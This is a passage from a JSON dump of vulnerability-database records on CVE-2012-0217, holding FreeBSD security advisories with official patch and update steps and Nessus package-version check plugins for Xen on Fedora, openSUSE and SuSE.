1.632.2.14.2.14\r\n src/sys/conf/newvers.sh 1.83.2.10.2.15\r\n src/sys/amd64/amd64/trap.c 1.332.2.10.2.2\r\nRELENG_9\r\n src/sys/amd64/amd64/trap.c 1.357.2.9\r\nRELENG_9_0\r\n src/UPDATING 1.702.2.4.2.5\r\n src/sys/conf/newvers.sh 1.95.2.4.2.7\r\n src/sys/amd64/amd64/trap.c 1.357.2.2.2.3\r\n- -------------------------------------------------------------------------\r\n\r\nSubversion:\r\n\r\nBranch/path Revision\r\n- -------------------------------------------------------------------------\r\nstable/7/ r236953\r\nreleng/7.4/ r236953\r\nstable/8/ r236953\r\nreleng/8.3/ r236953\r\nreleng/8.2/ r236953\r\nreleng/8.1/ r236953\r\nstable/9/ r236953\r\nreleng/9.0/ r236953\r\n- -------------------------------------------------------------------------\r\n\r\nVII. References\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0217\r\n\r\nThe latest revision of this advisory is available at\r\nhttp://security.FreeBSD.org/advisories/FreeBSD-SA-12:04.sysret.asc\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (FreeBSD)\r\n\r\niEYEARECAAYFAk/XQGgACgkQFdaIBMps37KCsACdEvLcb0JhWKmVlvq5SuKzuW1Q\r\nfhsAnRVLFoGa2WGnRpfQrLYCjL9gs8Rd\r\n=RvZd\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-06-13T00:00:00", "published": "2012-06-13T00:00:00", "id": "SECURITYVULNS:DOC:28131", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28131", "title": "CVE-2012-0217", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:47", "bulletinFamily": "software", "cvelist": ["CVE-2012-0217"], "description": "Privilege escalation on susret on some CPUs.", "edition": 1, "modified": "2012-06-25T00:00:00", "published": "2012-06-25T00:00:00", "id": "SECURITYVULNS:VULN:12411", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12411", "title": "FreeBSD kernel privilege escalation", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:45", "bulletinFamily": "software", "cvelist": ["CVE-2012-0217"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n=============================================================================\r\nFreeBSD-SA-12:04.sysret Security Advisory\r\n The FreeBSD Project\r\n\r\nTopic: Privilege escalation when returning from kernel\r\n\r\nCategory: core\r\nModule: sys_amd64\r\nAnnounced: 2012-06-12\r\nCredits: Rafal Wojtczuk, John Baldwin\r\nAffects: All supported versions of FreeBSD\r\nCorrected: 2012-06-12 12:10:10 UTC (RELENG_7, 7.4-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_7_4, 7.4-RELEASE-p9)\r\n 2012-06-12 12:10:10 UTC (RELENG_8, 8.3-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_8_3, 8.3-RELEASE-p3)\r\n 2012-06-12 12:10:10 UTC (RELENG_8_2, 8.2-RELEASE-p9)\r\n 2012-06-18 21:00:54 UTC (RELENG_8_1, 8.1-RELEASE-p12)\r\n 2012-06-12 12:10:10 UTC (RELENG_9, 9.0-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_9_0, 9.0-RELEASE-p3)\r\nCVE Name: CVE-2012-0217\r\n\r\nFor general information regarding FreeBSD Security Advisories,\r\nincluding descriptions of the fields above, security branches, and the\r\nfollowing sections, please visit <URL:http://security.FreeBSD.org/>.\r\n\r\n0. Revision History\r\n\r\nv1.0 2012-06-12 Initial release.\r\nv1.1 2012-06-19 Corrected patch FreeBSD 8.1.\r\n\r\nI. Background\r\n\r\nThe FreeBSD operating system implements a rings model of security, where\r\nprivileged operations are done in the kernel, and most applications\r\nrequest access to these operations by making a system call, which puts\r\nthe CPU into the required privilege level and passes control to the\r\nkernel.\r\n\r\nII. Problem Description\r\n\r\nFreeBSD/amd64 runs on CPUs from different vendors. Due to varying\r\nbehaviour of CPUs in 64 bit mode a sanity check of the kernel may be\r\ninsufficient when returning from a system call.\r\n\r\nIII. Impact\r\n\r\nSuccessful exploitation of the problem can lead to local kernel privilege\r\nescalation, kernel data corruption and/or crash.\r\n\r\nTo exploit this vulnerability, an attacker must be able to run code with user\r\nprivileges on the target system.\r\n\r\nIV. Workaround\r\n\r\nNo workaround is available.\r\n\r\nHowever FreeBSD/amd64 running on AMD CPUs is not vulnerable to this\r\nparticular problem.\r\n\r\nSystems with 64 bit capable CPUs, but running the 32 bit FreeBSD/i386\r\nkernel are not vulnerable, nor are systems running on different\r\nprocessor architectures.\r\n\r\nV. Solution\r\n\r\nPerform one of the following:\r\n\r\n1) Upgrade your vulnerable system to 7-STABLE, 8-STABLE, or 9-STABLE,\r\nor to the RELENG_7_4, RELENG_8_3, RELENG_8_2, RELENG_8_1, or RELENG_9_0\r\nsecurity branch dated after the correction date.\r\n\r\n2) To update your vulnerable system via a source code patch:\r\n\r\nThe following patches have been verified to apply to FreeBSD 7.4,\r\n8.3, 8.2, 8.1 and 9.0 systems.\r\n\r\na) Download the relevant patch from the location below, and verify the\r\ndetached PGP signature using your PGP utility.\r\n\r\n[7.4, 8.3, 8.2, 9.0]\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret.patch.asc\r\n\r\n[8.1]\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81.patch.asc\r\n\r\n[8.1 if original sysret.patch has been applied]\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81-correction.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81-correction.patch.asc\r\n\r\nb) Apply the patch.\r\n\r\n# cd /usr/src\r\n# patch < /path/to/patch\r\n\r\nc) Recompile your kernel as described in\r\n<URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the\r\nsystem.\r\n\r\n3) To update your vulnerable system via a binary patch:\r\n\r\nSystems running 7.4-RELEASE, 8.3-RELEASE, 8.2-RELEASE, 8.1-RELEASE,\r\nor 9.0-RELEASE on the i386 or amd64 platforms can be updated via the\r\nfreebsd-update(8) utility:\r\n\r\n# freebsd-update fetch\r\n# freebsd-update install\r\n\r\nVI. Correction details\r\n\r\nThe following list contains the revision numbers of each file that was\r\ncorrected in FreeBSD.\r\n\r\nCVS:\r\n\r\nBranch Revision\r\n Path\r\n- -------------------------------------------------------------------------\r\nRELENG_7\r\n src/sys/amd64/amd64/trap.c 1.319.2.14\r\nRELENG_7_4\r\n src/UPDATING 1.507.2.36.2.11\r\n src/sys/conf/newvers.sh 1.72.2.18.2.14\r\n src/sys/amd64/amd64/trap.c 1.319.2.12.2.2\r\nRELENG_8\r\n src/sys/amd64/amd64/trap.c 1.332.2.24\r\nRELENG_8_3\r\n src/UPDATING 1.632.2.26.2.5\r\n src/sys/conf/newvers.sh 1.83.2.15.2.7\r\n src/sys/amd64/amd64/trap.c 1.332.2.21.2.2\r\nRELENG_8_2\r\n src/UPDATING 1.632.2.19.2.11\r\n src/sys/conf/newvers.sh 1.83.2.12.2.14\r\n src/sys/amd64/amd64/trap.c 1.332.2.14.2.2\r\nRELENG_8_1\r\n src/UPDATING 1.632.2.14.2.15\r\n src/sys/conf/newvers.sh 1.83.2.10.2.16\r\n src/sys/amd64/amd64/trap.c 1.332.2.10.2.3\r\nRELENG_9\r\n src/sys/amd64/amd64/trap.c 1.357.2.9\r\nRELENG_9_0\r\n src/UPDATING 1.702.2.4.2.5\r\n src/sys/conf/newvers.sh 1.95.2.4.2.7\r\n src/sys/amd64/amd64/trap.c 1.357.2.2.2.3\r\n- -------------------------------------------------------------------------\r\n\r\nSubversion:\r\n\r\nBranch/path Revision\r\n- -------------------------------------------------------------------------\r\nstable/7/ r236953\r\nreleng/7.4/ r236953\r\nstable/8/ r236953\r\nreleng/8.3/ r236953\r\nreleng/8.2/ r236953\r\nreleng/8.1/ r237242\r\nstable/9/ r236953\r\nreleng/9.0/ r236953\r\n- -------------------------------------------------------------------------\r\n\r\nVII. References\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0217\r\n\r\nThe latest revision of this advisory is available at\r\nhttp://security.FreeBSD.org/advisories/FreeBSD-SA-12:04.sysret.asc\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9\r\n\r\niEYEARECAAYFAk/gjHQACgkQFdaIBMps37KutQCgkcp+lqFuJ3/fQKUemn80suW5\r\nu/wAn2VLxY5LoUPNsN2eUHYB4GMz0AHl\r\n=tQOk\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-06-25T00:00:00", "published": "2012-06-25T00:00:00", "id": "SECURITYVULNS:DOC:28207", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28207", "title": "FreeBSD Security Advisory FreeBSD-SA-12:04.sysret [REVISED]", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-12T10:10:43", "description": "64-bit PV guest privilege escalation vulnerability [CVE-2012-0217],\nguest denial of service on syscall/sysenter exception generation\n[CVE-2012-0218], PV guest host Denial of Service [CVE-2012-2934]\nEnable xenconsoled by default under systemd, adjust xend.service\nsystemd file to avoid selinux problems\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "published": "2012-06-26T00:00:00", "title": "Fedora 17 : xen-4.1.2-20.fc17 (2012-9386)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2012-06-26T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:xen"], "id": "FEDORA_2012-9386.NASL", "href": "https://www.tenable.com/plugins/nessus/59692", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-9386.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59692);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2012-9386\");\n\n script_name(english:\"Fedora 17 : xen-4.1.2-20.fc17 (2012-9386)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"64-bit PV guest privilege escalation vulnerability [CVE-2012-0217],\nguest denial of service on syscall/sysenter exception generation\n[CVE-2012-0218], PV guest host Denial of Service [CVE-2012-2934]\nEnable xenconsoled by default under systemd, adjust xend.service\nsystemd file to avoid selinux problems\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=829732\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/082824.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c5a16806\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"xen-4.1.2-20.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T11:12:03", "description": "This update of XEN fixed multiple security flaws that could be\nexploited by local attackers to cause a Denial of Service or\npotentially escalate privileges. Additionally, several other upstream\nchanges were backported.", "edition": 19, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : xen (openSUSE-SU-2012:0886-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:xen-doc-html", "p-cpe:/a:novell:opensuse:xen-devel", "cpe:/o:novell:opensuse:12.1", "p-cpe:/a:novell:opensuse:xen-kmp-desktop", "p-cpe:/a:novell:opensuse:xen-kmp-pae", "p-cpe:/a:novell:opensuse:xen", "p-cpe:/a:novell:opensuse:xen-tools-debuginfo", "p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:xen-doc-pdf", "p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs", "p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs-32bit", "p-cpe:/a:novell:opensuse:xen-debugsource", "p-cpe:/a:novell:opensuse:xen-tools", "p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:xen-tools-domU", "p-cpe:/a:novell:opensuse:xen-kmp-default", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo-32bit"], "id": "OPENSUSE-2012-403.NASL", "href": "https://www.tenable.com/plugins/nessus/74682", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-403.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74682);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n\n script_name(english:\"openSUSE Security Update : xen (openSUSE-SU-2012:0886-1)\");\n script_summary(english:\"Check for the openSUSE-2012-403 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of XEN fixed multiple security flaws that could be\nexploited by local attackers to cause a Denial of Service or\npotentially escalate privileges. Additionally, several other upstream\nchanges were backported.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757537\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=764077\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-07/msg00035.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-debugsource-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-devel-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-default-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-default-debuginfo-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-desktop-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-desktop-debuginfo-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-pae-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-kmp-pae-debuginfo-4.1.2_17_k3.1.10_1.16-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-libs-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-libs-debuginfo-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-tools-domU-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xen-tools-domU-debuginfo-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-doc-html-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-doc-pdf-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-32bit-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-tools-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-tools-debuginfo-4.1.2_17-1.10.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T19:09:23", "description": "Three security issues were found in XEN.\n\nTwo security issues are fixed by this update :\n\n - Due to incorrect fault handling in the XEN hypervisor it\n was possible for a XEN guest domain administrator to\n execute code in the XEN host environment.\n (CVE-2012-0217)\n\n - Also a guest user could crash the guest XEN kernel due\n to a protection fault bounce. (CVE-2012-0218)\n\nThe third fix is changing the Xen behaviour on certain hardware :\n\n - The issue is a denial of service issue on older pre-SVM\n AMD CPUs (AMD Erratum 121). (CVE-2012-2934)\n\n AMD Erratum #121 is described in 'Revision Guide for AMD\n Athlon 64 and AMD Opteron Processors':\n http://support.amd.com/us/Processor_TechDocs/25759.pdf\n\n The following 130nm and 90nm (DDR1-only) AMD processors\n are subject to this erratum :\n\no\n\nFirst-generation AMD-Opteron(tm) single and dual core\nprocessors in either 939 or 940 packages :\n\n - AMD Opteron(tm) 100-Series Processors\n\n - AMD Opteron(tm) 200-Series Processors\n\n - AMD Opteron(tm) 800-Series Processors\n\n - AMD Athlon(tm) processors in either 754, 939 or 940\n packages\n\n - AMD Sempron(tm) processor in either 754 or 939 packages\n\n - AMD Turion(tm) Mobile Technology in 754 package This\n issue does not effect Intel processors.\n\n The impact of this flaw is that a malicious PV guest\n user can halt the host system.\n\n As this is a hardware flaw, it is not fixable except by\n upgrading your hardware to a newer revision, or not\n allowing untrusted 64bit guestsystems.\n\n The patch changes the behaviour of the host system\n booting, which makes it unable to create guest machines\n until a specific boot option is set.\n\n There is a new XEN boot option 'allow_unsafe' for GRUB\n which allows the host to start guests again.\n\n This is added to /boot/grub/menu.lst in the line looking\n like this :\n\n kernel /boot/xen.gz .... allow_unsafe\n\n Note: .... in this example represents the existing boot\n options for the host.", "edition": 18, "published": "2012-06-13T00:00:00", "title": "SuSE 10 Security Update : Xen (ZYPP Patch Number 8180)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2012-06-13T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_XEN-201206-8180.NASL", "href": "https://www.tenable.com/plugins/nessus/59469", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59469);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n\n script_name(english:\"SuSE 10 Security Update : Xen (ZYPP Patch Number 8180)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Three security issues were found in XEN.\n\nTwo security issues are fixed by this update :\n\n - Due to incorrect fault handling in the XEN hypervisor it\n was possible for a XEN guest domain administrator to\n execute code in the XEN host environment.\n (CVE-2012-0217)\n\n - Also a guest user could crash the guest XEN kernel due\n to a protection fault bounce. (CVE-2012-0218)\n\nThe third fix is changing the Xen behaviour on certain hardware :\n\n - The issue is a denial of service issue on older pre-SVM\n AMD CPUs (AMD Erratum 121). (CVE-2012-2934)\n\n AMD Erratum #121 is described in 'Revision Guide for AMD\n Athlon 64 and AMD Opteron Processors':\n http://support.amd.com/us/Processor_TechDocs/25759.pdf\n\n The following 130nm and 90nm (DDR1-only) AMD processors\n are subject to this erratum :\n\no\n\nFirst-generation AMD-Opteron(tm) single and dual core\nprocessors in either 939 or 940 packages :\n\n - AMD Opteron(tm) 100-Series Processors\n\n - AMD Opteron(tm) 200-Series Processors\n\n - AMD Opteron(tm) 800-Series Processors\n\n - AMD Athlon(tm) processors in either 754, 939 or 940\n packages\n\n - AMD Sempron(tm) processor in either 754 or 939 packages\n\n - AMD Turion(tm) Mobile Technology in 754 package This\n issue does not effect Intel processors.\n\n The impact of this flaw is that a malicious PV guest\n user can halt the host system.\n\n As this is a hardware flaw, it is not fixable except by\n upgrading your hardware to a newer revision, or not\n allowing untrusted 64bit guestsystems.\n\n The patch changes the behaviour of the host system\n booting, which makes it unable to create guest machines\n until a specific boot option is set.\n\n There is a new XEN boot option 'allow_unsafe' for GRUB\n which allows the host to start guests again.\n\n This is added to /boot/grub/menu.lst in the line looking\n like this :\n\n kernel /boot/xen.gz .... allow_unsafe\n\n Note: .... in this example represents the existing boot\n options for the host.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 